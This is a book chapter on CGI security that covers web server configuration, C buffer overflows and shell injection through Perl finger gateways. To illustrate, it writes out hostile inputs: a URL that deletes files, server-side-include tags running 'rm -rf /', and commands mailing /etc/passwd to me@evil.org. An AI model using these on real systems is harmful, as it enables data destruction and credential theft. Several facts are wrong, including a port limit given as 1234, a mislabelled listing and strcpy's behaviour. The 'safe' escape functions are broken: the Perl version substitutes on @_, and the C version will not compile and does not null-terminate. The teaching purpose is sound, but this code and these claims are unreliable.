|
CGI Security
chapter9
·
Basic Security Issues
·
Operating Systems
·
Securing Your Web Server
·
Writing Secure CGI Programs
·
Language Risks
·
Shell Dangers
·
Secure Transactions
·
SSL
·
SHTTP
·
Summary
Unless
you've programmed network software in the past, security has probably been
the least of your programming concerns. After all, you don't need to worry
about writing insecure programs on a single-user machine because,
presumably, only one person has access to the machine anyway.
However, programming software
designed for use over the Internet requires a different paradigm of
programming with a much greater emphasis on security. There's an old
computer maxim that says the only way to truly secure a computer is to
disconnect it from the rest of the world and keep it in a locked room.
Simply connecting the machine to a network weakens your machine's security.
This especially holds true for a
large scale "network of networks" like the Internet, where literally
millions of people potentially have access to your computer. Many of the
services over the Internet-especially the World Wide Web-were designed so
that other people could easily access information from your computer. Each
of these services you make available (either consciously or inadvertently)
is another possible door for a wily, malicious user to exploit. A badly
written network server can be easily intruded, potentially giving someone
access to your entire machine and your important data.
What do I mean when I say that
every network service you provide is like another door on your system? What
exactly constitutes a security breach? For all intents and purposes, a
security breach is when a person gains unauthorized access to your
machine. "Unauthorized access" can mean many things ranging from running a
program on the server not meant to be publicly run to obtaining root access
on a UNIX machine.
You are largely dependent on the
knowledge and carefulness of the programmers who wrote the network servers
for security. After all, one cannot expect you to have to carefully sift
through thousands of lines of source code simply to make sure there are no
security holes in the software; for the most part, you depend on the
reliability of the programmer and other experts who have sifted through
source code and carefully tested the software. While past incidents such as
the Internet Worm have demonstrated that you cannot completely trust
programmers to write perfectly secure code, you can take steps to minimize
the risk.
Later, in "Securing Your Web
Server," you learn Web server security. For the moment, assume your Web
server software is secure and properly configured; that is, no one can gain
unauthorized access to your machine through your Web server alone. Why is it
important to write secure CGI scripts? CGI is a generic protocol that
enables you to extend the Web server. By writing a CGI program, you are
adding functionality to the Web server, functionality that might
inadvertently introduce new security holes. A carelessly written CGI
application can allow anyone full access to your machine.
When users submit a form or access
a CGI script in another manner, you are essentially allowing them to run an
application remotely on your machine. Because many CGI applications accept
some form of user input (either through a fill-out form or from the command
line), to some extent you are allowing users to control how the CGI
application is run. As a CGI author, you need to make sure that your CGI
script can be used only for its specified purpose. This chapter goes over
related Web-security issues and provides in-depth information on writing
secure CGI programs. At the end of this chapter, you also learn how to write
CGI for secure transactions.
Basic
Security Issues
Overall security of your Web
serving machine depends on many factors. A secure CGI program is useless if
your server is misconfigured or if there are other holes on your system. I
discuss some of the related Web security issues here and explain how to
properly configure your Web server for CGI.
Operating Systems
A common question is which
platform is more secure for a Web server: a Macintosh running System 7, a
UNIX workstation, a PC running OS/2, and so on. There have been many wars on
this topic, each of which reflects people's different biases toward
different operating systems.
No operating system is clearly
more secure than another. UNIX is arguably more secure than a single-user
platform such as a Macintosh or a PC running Windows, because once a user
breaks into one of these latter machines, he or she has access to all your
files. UNIX, however, has a fundamental understanding of file ownerships and
permissions. If your server is configured correctly and is owned by a safe
(for example, non-root) user, then if someone unauthorized breaks in, he or
she can do only limited damage. Limited damage, however, can be bad enough,
as you will see in the examples later in this chapter.
On the other hand, because UNIX
often comes preconfigured with many different types of network services such
as mail, FTP, Gopher, WWW, and so on, there are more potential "doors" for
someone to enter. Securing all of these services is a difficult and
time-consuming process, even for the experienced administrator. Even if you
configure everything correctly, you are still at the mercy of possible bugs
in each individual package. Security flaws in various packages are not
uncommon, as is clear from the frequency of notices of insecurities in
various common UNIX network services from organizations such as the Computer
Emergency Response Team (CERT).
Every different platform has its
own different security implications, but one is not more secure than
another. Although you should be aware of the implications of each operating
system, it should not be your primary criteria when choosing a platform.
Choose your platform, seal off the holes associated with that platform, and
then configure your Web server securely and correctly. Only after you have
completed these steps should you concern yourself with writing secure CGI
scripts.
Securing Your Web Server
The first step in writing secure
CGI scripts is to make sure your Web server is securely and properly
configured. If your Web server is not secure, it does not matter how
carefully you write your CGI scripts; people can still break into your
machine. Additionally, configuring your Web server correctly helps minimize
the potential damage of a badly written CGI program.
|
Choosing a Secure Web
Server |
|
There are a countless number
of Web servers available for a variety of platforms, and deciding
which product is secure or not is a difficult if not impossible task.
As with any product, you will need to rely on company reputation and
word-of-mouth.
Examine your options. After
you have a list of Web servers, look at how long each product has been
available and how many people currently use it. The older and more
frequently used the Web server, the more likely security bugs have
been found and fixed. If the code is freely available and if you have
some time and expertise, look through the source code yourself and see
if you can find a potential hole. Read what people on the various Web
Usenet newsgroups have to say about each product and its authors or
publishers. Reputable companies or authors will inform their users
immediately about any problems with their product. Read the various
security alerts from organizations such as CERT and CIAC (Computer
Incident Advisory Capability).
Examine the feature-set and
determine whether you really need all of the features. The more
complex and powerful the server, the more likely there is an
undetected security hole. Make sure your server supports logging so
you can trace the cause of security break-ins or other trouble.
Have a contingency plan. Be
prepared to quickly upgrade or replace your Web server if a security
hole is discovered. Pay attention to news releases and the newsgroups
for information regarding your Web server. Try to use the latest
non-beta version of the Web server.
Don't be afraid of the free
servers. There is debate over whether providing source code makes a
server more or less secure. If the server source is not available,
security holes are more difficult to discover. If the source is
available, however, then theoretically holes can be discovered,
announced, and patched quickly. |
You should have three goals when
securing your Web server:
·
Configure your programs to do only what you want
them to do, nothing more.
·
Don't reveal any more information than necessary.
·
Minimize the potential damage if someone breaks
in.
The more I know about your
computer, the better equipped I am to break into it. For example, if I know
in which directory or folder all of your sensitive, private information was
stored, I have narrowed my objective from gaining total access to your
machine to simply gaining access to a directory, usually a simpler task. Or
if I had access to your server configuration files or source code to your
CGI scripts, I could easily browse through them looking for potential
security holes. If there are holes in your system, you don't want to make it
easy for others to know about them, and you want to find them before others
do.
Where Should You Put Your CGI?
As discussed earlier in
Chapter 2, "The Basics," most Web servers enable you to run CGI programs
in many different ways. For example, you could designate a specific
directory as your cgi-bin. Alternatively, you could allow CGI to be stored
in any directory.
There are advantages and
disadvantages to both, but from a security standpoint, it is better to
designate one directory to store all of your CGI applications. Having all of
your programs in one directory makes it easier to keep track of all of the
applications on your server and to audit them for potential security holes.
It also helps prevent tampering. If your scripts are located in several
different directories, you need to constantly check each one of these for
tampering.
If you tend to use a scripting
language (such as Perl) for most of your applications, then the source code
is contained within the application itself. This code, then, is potentially
vulnerable to being read, and exploited, if you're not careful. For example,
many text editors save backup files, usually appending some extension to the
end of the filename (such as .bak).
For example, emacs saves backup
files with the extension filename~. Suppose that you have a CGI script
written in Perl-program.cgi-stored in one of the Web data directories rather
than in a central designated directory. Now suppose that you made a trivial
change to the program using emacs and forgot to remove the backup file. You
now have two files in your directory: program.cgi and program.cgi~. The Web
server knows that files ending in .cgi are CGI programs and will run the
program rather than display its content. However, a smart user might try to
access program.cgi~ instead. Because it does not end in .cgi, your Web
server sends it as a raw text file, thus allowing the user to search your
source code for possible holes. This violates the first maxim of revealing
more information than necessary.
However, if your server enables
you to specify all files located in a certain directory as a CGI, it doesn't
matter what the extension of the file is. So in the same example earlier, if
the backup file were located in a properly designated directory and a user
tried to access it, the server would try to run the program rather than send
the source code.
Note that designating a central
directory as the location of all CGI programs on your server is limiting,
especially on a multiuser system. For example, if you are an Internet
Service Provider and you want to allow your users to write and run their own
CGI, you might be inclined to allow CGI to be stored in any directory.
Before you do this, consider the alternative options carefully. Are your
clients going to be writing a lot of special customized scripts? If not, it
is better to have your clients submit the scripts for auditing before being
added to the cgi-bin directory rather than enabling CGI in all directories.
Another issue regarding the
location of CGI programs is where to put the interpreter. For interpreted
scripts, the server runs the interpreter, which in turn loads the script and
executes it.
Never put the interpreter in your
cgi-bin directory, or in any directory in your data tree for that matter.
Giving users access to the interpreter essentially gives them the power to
run any application or any series of commands on your system.
This is especially important if
you use a Windows or other non-UNIX operating system. In UNIX, you can
specify the interpreter in the first line of your script. For example:
#!/usr/local/bin/perl
# this first line says use Perl to run the following script
In Windows, for example, there is
no analogous method of specifying the interpreter within the script. One way
to call a Perl script would be to create a batch file that calls Perl and
the script.
rem progname.bat
rem a wrapper for my perl script, progname.pl
c:\perl\perl.exe progname.pl
However, you might be inclined to
avoid creating this extra program by simply putting perl.exe in your cgi-bin
directory and accessing the following URL:
http://hostname/cgi-bin/perl.exe?progname.pl
This works, but it also enables
anyone in the world to run any Perl command on your machine. For example,
someone could access the following URL:
http://hostname/cgi-bin/perl.exe?-e+unlink+%3C*.*%3E%3B
Decoded, the previous line is
equivalent to calling Perl and running the following one-line program, which
will delete all the files in the current directory. Clearly, this is
undesirable.
unlink <*.*>;
You will never have a reason to
put an interpreter in your cgi-bin directory (or any directory capable of
running CGI), so never do it. Some Windows servers can determine the type of
script by its extension and run the appropriate interpreter. For example,
Win-HTTPD assumes every CGI script ending in .pl is a Perl script and will
run Perl automatically. If your Web server does not have this feature, use a
wrapper script like the first Windows Perl example earlier in this chapter.
|
Should I Use an
Interpreter? |
|
You should never even be
tempted to put an interpreter in your cgi-bin if you are using a UNIX
or Macintosh Web server. As noted earlier, UNIX enables you to specify
the location of the interpreter within the script. To enable scripts
on a Macintosh, you associate the script with the appropriate
interpreter by editing the resource using a utility such as ResEdit.
|
Server-Side Includes
In
Chapter 4, "Output," you learned a few reasons why you should avoid
server-side includes. A common reason often raised is security.
Specifically, some implementations of server-side includes (notably NCSA and
Netscape) enable users to embed the output of programs in an HTML document.
Every time one of these HTML files is accessed, the program is run on the
server-side and the output is displayed as part of the HTML document.
By allowing this sort of
server-side include, you become susceptible to a few potential security
risks. First, on a UNIX machine, the programs are run by the owner of the
server, not the owner of the program. If your server isn't properly
configured and you have sensitive files or programs owned by the server
owner, these files and programs and their output become accessible by users
on your machine.
This risk increases if you allow
users to edit HTML files on your system from Web browsers. A common example
of this is a guestbook. In a guestbook, users fill out a form and
submit messages to a CGI program, which will often simply append the
unedited message to an HTML file, the guestbook. By not editing or filtering
the submitted message, you allow the user to submit HTML code from his or
her browser. If you allow programs to be executed in a server-side include,
a malicious user can wreak havoc to your machine by submitting a tag like
the following:
<!--#exec cmd="/bin/rm -rf /"-->
This server-side include will
attempt to delete everything it can on your machine.
Note that you could have prevented
this problem in several ways without having to completely turn off
server-side includes. You could have filtered out all HTML tags before
appending the submitted text to your guestbook. Or you could have disabled
the exec capability of your server-side include (I show you how to do this
for the NCSA server later in this chapter in "Example: Securely Configuring
the NCSA Server").
If you forgot to do either of
these things, other precautions you should have taken would have greatly
minimized the damage on your machine by such a tag anyway. For example, as
long as your server was running as a nonexistent, non-root user, this tag
would most likely not have deleted anything of any importance, perhaps
nothing at all. Suppose that instead of attempting to delete everything on
your disks, the malicious user attempted to obtain your /etc/passwd for
hopeful cracking purposes using something like the following:
<!--#exec cmd="/bin/mail
me@evil.org < /etc/passwd"-->
However, if your system was using
the shadow password suite, then your /etc/passwd has no useful information
to potential hackers.
This example demonstrates two
important things about both server-side includes and CGI in general. First,
security holes can be completely hidden. Who would have thought that a
simple guestbook program on a system with server-side includes posed a large
security risk? Second, the potential damage of an inadvertent security hole
can be greatly minimized by carefully configuring your server and securing
your machine as a whole.
Although server-side includes add
another potentially useful dimension to your Web server, think carefully
about the potential risks, as well. In
Chapter 4, I offer several alternatives to using server-side includes.
Unless you absolutely need to use server-side includes, you might as well
disable them and close off a potential security hole.
Securing Your UNIX Web Server
A secured UNIX system is a
powerful platform for serving Web documents. However, there are many complex
issues associated with securing and properly configuring a UNIX Web server.
The very first thing you should do is make sure your machine is as secure as
possible.
Disable network services you don't
need, no matter how harmless you think they are. It is highly unlikely that
anyone can break into your machine using the finger protocol, for example,
which only answers queries about users. However, finger can give hackers
useful information about your system.
Secure your system internally. If
a hacker manages to break into one user's account, make sure the hacker
cannot gain any additional privileges. Useful actions include installing a
shadow password suite and removing all setuid scripts (scripts that are set
to run as the owner of the script, even if called by another user).
Securing a UNIX machine is a
complex topic and goes beyond the scope of this book. I highly recommend
that you purchase a book on the topic, read the resources available on the
Internet, even hire a consultant if necessary. Don't underestimate the
importance of securing your machine.
Next, allot separate space for
your Web server and document files. The intent of your document directories
is to serve these files to other people, possibly to the rest of the world,
so don't put anything in these directories that you wouldn't want anyone
else to see. Your server directories contain important log and configuration
information. You definitely do not want outside users to see this
information, and you most likely don't want most of your internal users to
see it or write to it either.
Set the ownership and permissions
of your directories and server wisely. It's common practice to create a new
user and group specifically to own Web-related directories. Make sure
nonprivileged users cannot write to the server or document directories.
Your server should never be
"running as root." This is a misleading statement. In UNIX, only root can
access ports less than 1234. Because by default Web servers run on port 80,
you need to be root to start a Web server. However, after the Web server is
started as root, it can either change its own process's ownership (if it's
internally threaded) or change the ownership of its child processes that
handle connections (if it's a forking server). Either method allows the
server to process requests as a non-root user. Make sure you configure your
Web server to "run as non-root," preferably as a completely nonexistent user
such as "nobody." This limits the potential damage if you have a security
hole in either your server or your CGI program.
Disable all features unless you
absolutely need them. If you initially disable a feature and then later
decide you want to use it, you can always turn it back on. Features you
might want to disable include server-side includes and serving symbolic
links.
If your users don't need to serve
their personal Web documents from your server, disable public Web
directories. This enables you to have complete and central control over all
documents served from your machine, an important quality for general
maintenance and security.
If your users do need to serve
their personal documents (for example, if you are an Internet Access
Provider), make sure they cannot override your main configuration. Seriously
consider whether users need the ability to run CGI programs from their own
personal directories. As stated earlier, it's preferable to store all CGI in
one centralized location.
|
CGIWRAP |
|
A popular package available
on the Web is cgiwrap, written by Nathan Neulinger nneul@umr.edu. This
package enables users to run their own CGI programs by running the
program as the owner of the program rather than the owner of the
server.
It's not clear whether this
is more or less beneficial than simply allowing anyone to run his or
her own CGI programs unwrapped. On one hand, a bad CGI script has the
capability to do less damage owned by nobody rather than by a user who
actually exists. On the other hand, if the CGI program does damage the
system as nobody, the responsibility lies on the system administrator,
whereas if only a specific user's files were damaged, it would
ultimately be the user's responsibility.
My advice would be to not go
with either option and simply disallow unaudited user CGI programs. If
this is unacceptable, then ultimately whether you use cgiwrap or a
similar program depends on where you want the responsibility to lie. |
Finally, you might want to
consider setting up a chroot environment for your Web documents. In UNIX,
you can protect a directory tree by using chroot. A server running inside of
a chrooted directory cannot see anything outside of that directory tree.
Under a chrooted environment, if someone manages to break in through your
Web server, they can damage files only within that directory tree.
Note, however, that a chrooted
environment is appropriate only for a Web server serving a single source of
documents. If your Web server is serving users' documents in multiple
directories, it is nearly impossible to set up an effective chrooted
environment. Additionally, a chrooted environment is weakened by the
existence of interpreters (such as Perl or a shell). In a chrooted
environment without any shells or interpreters, someone who has broken in
can at worst change or damage your files; with an interpreter, potential
damage increases.
Example: Securely Configuring
the NCSA Server
I'll demonstrate how one might go
about properly configuring a common Web server on a UNIX environment by
discussing the NCSA Server (v1.4.2). There are many Web servers available
for UNIX, but NCSA is one of the oldest, is commonly used, is freely
available, and is fairly easy to configure. I will demonstrate only the
configuration I think is most relevant to securing the Web server; for more
detailed instructions on configuring NCSA httpd, look at its Web site:
URL:http://hoohoo.ncsa.uiuc.edu/.
You can apply the principles demonstrated here to almost any UNIX Web
server.
First, I need to present the
criteria. In this scenario, I want to set up the NCSA server on a secured
UNIX machine for a small Internet service provider called MyCompany. The
machine's host name is www.mycompany.net. I want everyone with an account on
my machine to be able to serve his or her own Web documents and possibly use
CGI or other features.
What features do I absolutely
need? In this case, because I'm a small Internet service provider, I will
not let users serve their own CGI. If they want to write and use their own
CGI programs, they must submit it to me for auditing; if it's okay, I'll
install it. Additionally, I'll provide general programs that are commonly
requested, such as guestbooks and generic form-processing applications. I
don't need any other features for now in this scenario, including
server-side includes.
Here is how I'm going to configure
my Web server. I will create the user and group www; these will own all of
the appropriate directories. I will create one directory for my server files
(/usr/local/etc/httpd/) and one directory for the Web documents (/usr/local/etc/httpd/htdocs/).
Both directory trees will be world readable and user and group writeable.
Now, I'm ready to configure the
server. NCSA httpd has three configuration files: access.conf, httpd.conf,
and srm.conf. First, you need to tell httpd where your server and HTML
directories are located. In httpd.conf, specify the server directory with
the following line:
ServerRoot /usr/local/etc/httpd
In srm.conf, specify the document
directory with
DocumentRoot /usr/local/etc/httpd/htdocs
Because I want to designate all
files in /usr/local/etc/httpd/cgi-bin as CGI programs, I include the
following line in srm.conf:
ScriptAlias /cgi-bin/
/usr/local/etc/httpd/cgi-bin
Note that the actual location of
my cgi-bin directory is not in my document tree but in my server tree.
Because I want to keep my server directory (including the directory
containing the CGI) as private as possible, I keep it outside of the
document directory. If I have a CGI in this directory called mail.cgi, I can
access it by using the URL
http://www.mycompany.net/cgi-bin/mail.cgi
One other line in srm.conf needs
to be edited; it's not particularly relevant to our specific quest of
securing the server, but for completeness sake, I'll mention it anyway:
Alias /icons/ /usr/local/etc/httpd/icons
The Alias directive enables you to
specify an alias for a directory either in or out of your document directory
tree. Unlike the ScriptAlias directive, Alias does not change the meaning of
the directory in any other way.
Because I want to disable
server-side includes and not allow CGI in any directory other than cgi-bin,
I comment out the lines in srm.conf by inserting a pound sign (#) in front
of the line.
#AddType text/x-server-parsed-html
.shtml
#AddType application/x-httpd-cgi .cgi
AddType enables you to associate
MIME types with filename extensions. text/x-server-parsed-html is the MIME
type for parsed HTML (for example, HTML with embedded tags for server-side
includes) whereas application/x-httpd-cgi is the type for CGI applications.
I don't need to specify the extension for this MIME type in this case
because I've configured the server to assume that everything in the cgi-bin,
regardless of filename extension, is a CGI.
Finally, I need to set properties
and access restrictions to certain directories by editing the global
access.conf file. To define global parameters for all the directories,
simply put the directives in the file without any surrounding tags. In order
to specify parameters for specific directories, surround the directives with
<Directory directoryname>
tags, where directoryname is
the full path of the directory.
By default, the following global
options are set:
Options Indexes FollowSymLinks
Indexes enables you to specify a
file to look for if a directory is specified in the URL without a filename.
By default, this variable, specified by DirectoryIndex in srm.conf, is set
to index.html, which is fine for my purposes. FollowSymLinks means that the
server will return the data to which the symbolic link is pointing. I see no
need for this feature, so I'll disable it. Now, this line looks like the
following:
Options Indexes
If I want to allow CGI programs in
any directory, I could set that by including the option ExecCGI.
Options Indexes ExecCGI
This line, along with the AddType
directive in srm.conf, would allow me to run a CGI in any directory by
adding the extension .cgi to all CGI programs.
By default, NCSA httpd is
configured so that all of the settings in access.conf can be overridden by
creating an .htaccess file in the specific directory with the appropriate
properties and access restrictions. In this case, I don't mind if users
change their own access restrictions. However, I don't want users to give
themselves the ability to run CGI in their directories by including the .htaccess
file.
AddType application/x-httpd-cgi .cgi
Options Indexes ExecCGI
Therefore, I edit access.conf to
allow the user to override all settings except for Options.
AllowOverride FileInfo AuthConfig
Limit
My server is now securely
configured. I have disallowed CGI in all but the cgi-bin directory, and I've
completely disallowed server-side includes. The server runs as user nobody,
a non-
existent user on my system. I've disabled all features I don't need, and
users cannot override these important restrictions. For more information on
the many other configurations, including detailed access restrictions, refer
to the NCSA server documentation.
Writing
Secure CGI Programs
At this point, you have presumably
secured your machine and your Web server. You are finally ready to learn how
to write a secure CGI program. The basic principles for writing secure CGI
are similar to the ones outlined earlier:
·
Your program should do what you want and nothing
more.
·
Don't give the client more information than it
needs to know.
·
Don't trust the client to give you the proper
information.
I've already demonstrated the
potential danger of the first principle with the guestbook example. I
present a few other common mistakes that can open up holes, but you need to
remember to consider all of the implications of every function you write or
use.
The second principle is simply an
extension of a general security principle: the less the outside world knows
about the inside of your system, the less-equipped outsiders are to break
in.
This last principle is not just a
good programming rule of thumb but a good security one, as well. CGI
programs should be robust. One of the first things a hacker will try to do
to break into a machine through a CGI program is to try to confuse it by
experimenting with the input. If your program is not robust, it will either
crash or do something it was not designed to do. Both possibilities are
undesirable. To combat this possibility, don't make any assumptions about
the format of the information or the values the client will send.
The most barebone CGI program is a
simple input/output program. It takes what the client tells it and returns
some response. Such a program offers very little risk (although possible
holes still exist, as you will later see). Because the CGI program is not
doing anything interesting with the input, nothing wrong is likely to
happen. However, once your program starts manipulating the input, possibly
calling other programs, writing files, or doing anything more powerful than
simply returning some output, you risk introducing a security hole. As
usual, power is directly proportional to security risk.
Language Risks
Different languages have different
inherent security risks. Secure CGI programs can be written in any language,
but you need to be aware of each language's quirks. I discuss only C and
Perl here, but some of the traits can be generalized to other languages. For
more specific information on other languages, refer to the appropriate
documentation.
Earlier in this chapter you
learned that in general, compiled CGI programs are preferable to interpreted
scripts. Compiled programs have two advantages: first, you don't need to
have an interpreter accessible to the server, and second, source code is not
available. Note that some traditionally interpreted languages such as Perl
can be compiled into a binary. (For information on how to do this in Perl,
consult Larry Wall and Randall Schwartz's Programming Perl published
by O'Reilly and Associates). From a security standpoint, a compiled Perl
program is just as good as a compiled C program.
Lower-level languages such as C
suffer from a problem called a buffer overflow. C doesn't have a good
built-in method of dealing with strings. The traditional method is to
declare either an array of characters or a pointer to a character. Many have
a tendency to use the former method because it is easier to program.
Consider the two equivalent excerpts of code in Listings 9.1 and 9.2.
-----------------------------------------------
Listing 9.1. Defining a string
using an array in C.
#include <stdio.h>
#include <string.h>
#define message "Hello, world!"
int main()
{
char buffer[80];
strcpy(buffer,message);
printf("%s\n",buffer);
return 0;
}
----------------------------------------
Listing 9.2. Defining a string
using a pointer in C.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define message "Hello, world!"
int main()
{
char *buffer = malloc(sizeof(char) * (strlen(message) + 1));
strcpy(buffer,message);
printf("%s\n",buffer);
return 0;
}
----------------------------------------------
Listing 9.1 is much simpler than
Listing 9.2, and in this specific example, both work fine. This is a
contrived example; I already know the length of the string I am dealing
with, and consequently, I can define the appropriate length array. However,
in a CGI program, you have no idea how long the input string is. If message,
for example, were longer than 80 characters, the code in Listing 9.2 would
crash.
This is called a buffer
overflow, and smart hackers can exploit these to remotely execute
commands. The buffer overflow was the bug that afflicted NCSA httpd v1.3.
It's a good example of how and why a network (or CGI) programmer needs to
program with more care. On a single-user machine, a buffer overflow simply
leads to a crash. There is no advantage to executing programs using a buffer
overflow on a crashed single-user machine because presumably (with the
exception of public terminals), you could have run any program you wanted
anyway. However, on a networked system, a crashed CGI program is more than a
nuisance; it's a potential door for unauthorized users to enter.
The code in Listing 9.2 solves two
problems. First, it dynamically allocates enough memory to store the string.
Second, notice that I added 1 to the length of the message. I actually
allocate enough memory for one more character than the length of the string.
This is to guarantee the string is null-terminated. The strcpy() function
pads the remainder of the target string with null characters, and because
the target string always has room for one extra character, strcpy() places a
null character there. There's no reason to assume that the input string sent
to the CGI script ends in a null character, so I place one at the end just
in case.
Provided your C programs avoid
problems such as buffer overflows, you can write secure CGI programs.
However, this is a tough provision, especially for large, more complicated
CGI programs. Problems like this force you to spend more time thinking about
low-level programming tasks rather than the general CGI task. For this
reason, you might prefer to program in a higher-level programming language
(such as Perl) that robustly handles such low-level tasks.
However, there is a flip side to
the high-level nature of Perl. Although you can assume that Perl will
properly handle string allocation for you, there is always the danger that
Perl is doing something in a high-level syntax of which you are not aware.
This will become clearer in the next section on shell dangers.
Shell Dangers
Many CGI tasks are most easily
implemented by running other programs. For example, if you were to write a
CGI mail gateway, it would be silly to completely reimplement a mail
transport agent within the CGI program. It's much more practical to pipe the
data into an existing mail transport agent such as sendmail and let sendmail
take care of the rest of the work. This practice is fine and is encouraged.
The security risk depends on how
you call these external programs. There are several functions that do this
in both C and Perl. Many of these functions work by spawning a shell and by
having the shell execute the command. These functions are listed in Table
9.1. If you use one of these functions, you are vulnerable to weaknesses in
UNIX shells.
Table 9.1. Functions in both C
and Perl that spawn a shell.
|
Perl Functions |
C Functions
|
|
system(' . . . ')
|
system() |
|
open('| . . . ')
|
popen() |
|
exec(' . . . ') |
|
|
eval(' . . . ') |
|
|
' . . . ' |
|
Why are shells dangerous? There
are several nonalphanumeric characters that are reserved as special
characters by the shell. These characters are called metacharacters
and are listed in Table 9.2.
Table 9.2. Shell metacharacters.
|
; |
< |
> |
* |
| |
|
' |
& |
$ |
! |
# |
|
( |
) |
[ |
] |
: |
|
{ |
} |
' |
" |
|
Each of these metacharacters
performs special functions within the shell. For example, suppose that you
wanted to finger a machine and save the results to a file. From the command
line, you might type:
finger @fake.machine.org > results
This would finger the host
fake.machine.org and save the results to the text file results. The >
character in this case is a redirection character. If you wanted to actually
use the > character-for example, if you want to echo it to the screen-you
would need to precede the character with a backslash. For example, the
following would print a greater-than symbol > to the screen:
echo \>
This is called escaping or
sanitizing the character string.
How can a hacker use this
information to his or her advantage? Observe the finger gateway written in
Perl in Listing 9.3. All this program is doing is allowing the user to
specify a user and a host, and the CGI will finger the user at the host and
display the results.
----------------------------------------
Listing 9.3. finger.cgi.
#!/usr/local/bin/perl
# finger.cgi - an unsafe finger gateway
require 'cgi-lib.pl';
print &PrintHeader;
if (&ReadParse(*in)) {
print "<pre>\n";
print '/usr/bin/finger $in{'username'}';
print "</pre>\n";
}
else {
print "<html> <head>\n";
print "<title>Finger Gateway</title>\n";
print "</head>\n<body>\n";
print "<h1>Finger Gateway</h1>\n";
print "<form method=POST>\n";
print "<p>User@Host: <input type=text name=\"username\">\n";
print "<p><input type=submit>\n";
print "</form>\n";
print "</body> </html>\n";
}
-----------------------------------------------
At first glance, this might seem
like a harmless finger gateway. There's no danger of a buffer overflow
because it is written in Perl. I use the complete pathname of the finger
binary so the gateway can't be tricked into using a fake finger program. If
the input is in an improper format, the gateway will return an error but not
one that can be manipulated.
However, what if I try entering
the following field :
nobody@nowhere.org ; /bin/rm -rf /
Work out how the following line
will deal with this input:
print `/usr/bin/finger $in{'username'}`;
Because you are using back ticks,
first it will spawn a shell. Then it will execute the following command:
/usr/bin/finger nobody@nowhere.org
; /bin/rm -rf /
What will this do? Imagine typing
this in at the command line. It will wipe out all of the files and
directories it can, starting from the root directory. We need to sanitize
this input to render the semicolon (;) metacharacter harmless. In Perl, this
is easily achieved with the function listed in Listing 9.4. (The equivalent
function for C is in Listing 9.5; this function is from the cgihtml C
library.)
-------------------------------------
Listing 9.4. escape_input() in
Perl.
sub escape_input {
@_ =~ s/([;<>\*\|`&\$!?#\(\)\[\]\{\}:'"\\])/\\$1/g;
return @_;
}
---------------------------------------------
Listing 9.5. escape_input() in
C.
char *escape_input(char *str)
/* takes string and escapes all metacharacters. should be used before
including string in system() or similar call. */
{
int i,j = 0;
char *new = malloc(sizeof(char) * (strlen(str) * 2 + 1));
for (i = 0; i < strlen(str); i++) {
printf("i = %d; j = %d\n",i,j);
switch (str[i]) {
case '|': case '&': case ';': case '(': case ')': case '<':
case '>': case '\'': case '"': case '*': case '?': case '\\':
case '[': case ']': case '$': case '!': case '#': case ';':
case '`': case '{': case '}':
new[j] = '\\';
j++;
break;
default:
break;
}
new[j] = str[i];
j++;
}
new[j] = '\n';
return new;
}
--------------------------------------------------
This returns a string with the
shell metacharacters preceded by a backslash. The revised finger.cgi gateway
is in Listing 9.6.
-----------------------------------
Listing 9.6. A safe finger.cgi.
#!/usr/local/bin/perl
# finger.cgi - an safe finger gateway
require 'cgi-lib.pl';
sub escape_input {
@_ =~ s/([;<>\*\|`&\$!#\(\)\[\]\{\}:'"])/\\$1/g;
return @_;
}
print &PrintHeader;
if (&ReadParse(*in)) {
print "<pre>\n";
print `/usr/bin/finger &escape_input($in{'username'})`;
print "</pre>\n";
}
else {
print "<html> <head>\n";
print "<title>Finger Gateway</title>\n";
print "</head>\n<body>\n";
print "<h1>Finger Gateway</h1>\n";
print "<form method=POST>\n";
print "<p>User@Host: <input type=text name=\"username\">\n";
print "<p><input type=submit>\n";
print "</form>\n";
print "</body> </html>\n";
}
-----------------------------------------------------------------
This time, if you try the same
input as the preceding, a shell is spawned and it tries to execute:
/usr/bin/finger nobody@nowhere.org
\; /bin/rm -rf /
The malicious attempt has been
rendered useless. Rather than attempt to delete all the directories on the
file system, it will try to finger the users nobody@nowhere.org, ;, /bin/rm,
-rf, and /. It will probably return an error because it is unlikely that the
latter four users exist on your system.
Note a couple of things. First, if
your Web server was configured correctly (for example, running as non-root),
the attempt to delete everything on the file system would have failed. (If
the server was running as root, then the potential damage is limitless.
Never do this!) Additionally, the user would have to assume that the rm
command was in the /bin directory. He or she could also have assumed that rm
was in the path. However, both of these are pretty reasonable guesses for
the majority of UNIX machines, but they are not global truths. On a chrooted
environment that did not have the rm binary located anywhere in the
directory tree, the hacker's efforts would have been a useless endeavor. By
properly securing and configuring the Web server, you can theoretically
minimize the potential damage to almost zero, even with a badly written
script.
However, this is no cause to
lessen your caution when writing your CGI programs. In reality, most Web
environments are not chrooted, simply because it prevents the flexibility
many people need in a Web server. Even if one could not remove all the files
in a file system because the server was not running as root, someone could
just as easily try input such as the following, which would have e-mailed
the /etc/passwd file to me@evil.org for possible cracking:
nobody@nowhere.org
; /bin/mail me@evil.org < /etc/passwd
A hacker could do any number of
other things by manipulating this one hole, even in a well-configured
environment. If you let a hole slip past you in a simple CGI program, how
can you be sure you properly and securely configured your complicated UNIX
system and Web server?
The answer is, you can't. Your
best bet is to make sure your CGI programs are secure. Not sanitizing input
before running it in a shell is a simple thing to cure, and yet it is one of
the most common mistakes in CGI programming.
Fortunately, Perl has a good
mechanism for catching potentially tainted variables. If you use taintperl
instead of Perl (or perl -T if you are using Perl 5), the script will exit
at points where potentially tainted variables are passed to a shell command.
This will help you catch all instances of potentially tainted variables
before you actually begin to use your CGI program.
Notice that there are several more
functions in Perl that spawn the shell than there are in C. It is not
immediately obvious, even to the intermediate Perl programmer, that back
ticks spawn a shell before executing the program. This is the alternative
danger of higher-level language; you don't know what security holes a
function might cause because you don't necessarily know exactly what it
does.
You don't need to sanitize the
input if you avoid using functions that spawn shells. In Perl, you can do
this with either the system() or exec() function by enclosing each argument
in separate quotes. For example, the following is safe without sanitizing
$input:
system("/usr/ucb/finger",$input{'username'});
However, in the case of your
finger gateway, this feature is useless because you need to process the
output of the finger command, and there is no way to trap it if you use the
system() function.
In C, you can also execute
programs directly by using the exec class of functions: execv(), execl(),
execvp(), execlp(), and execle(). execl() would be the C equivalent of the
Perl function system() with multiple arguments. Which exec function you use
and how you implement it depends on your need; specifics go beyond the scope
of this book.
Secure
Transactions
One aspect of security only
briefly discussed earlier is privacy. A popular CGI application these days
tends to be one that collects credit card information. Data collection is a
simple task for a CGI application, but the collection of sensitive data
